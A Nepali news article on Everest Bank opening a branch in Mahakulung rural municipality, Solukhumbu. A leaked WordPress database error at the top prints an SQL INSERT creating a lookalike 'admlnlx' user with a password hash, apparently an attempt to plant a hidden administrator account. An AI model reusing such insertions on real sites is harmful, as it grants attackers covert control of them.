WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8SCAnolF9GzfUTgQTc3fhvgu15TjP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 07:18:39', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १३ चैत्र, काठमाडौँ । सोलुखुम्बुको महाकुलुङ गाउँपालिकामा एभरेष्ट बैँकले बैकिङ सेवा सुरु गरेको छ । जिल्लाकै सुदुर एवं दुर्गममा रहेको यस गाउँपालिकामा ‘क’ वर्गको बैँक आजैबाट सञ्चालन भएको हो ।
बैँकको शाखा कार्यालय बुङचोकमा राखीएको छ । गाउँपालिकाको समन्वयमा ऐभरेष्ट बैँकले शाखा विस्तार गरेको हो । बैंकले आजैबाट बैंकिङ सेवा सुरु गरेको लगभक १०० जनाले आजनै खाता सन्चालन गरेको गाउँपालिका अध्यक्ष सागर किरातिले बताए ।
अब, यहाँका स्थानीयहरु बैंकिङ कारोबारका लागि सदरमुकाम सल्लेरी धाउन नपर्ने भएको छ । यसरी ‘क’ वर्गको वैंक गाउँपालिकामा संचालन गरिनु महत्वपुर्ण सफलता रहेको अध्यक्ष किराँतीले बताए ।
वैंकको साखा संचालनसँगै सर्वसाधारणले बैंकिङ कारोबारको सुविधा गाउँमै पाउने भएका छन् । वैंकले चल्ती खाता, साधारण बचत खाता, बाल बचत खाता, बुवाआमा बचत खाताहरु संचालनमा ल्याउने जनाएको छ । भने रकम देशभित्र र बाहिरबाट पठाउन र झिक्न मिल्ने सुविधा रहेको छ ।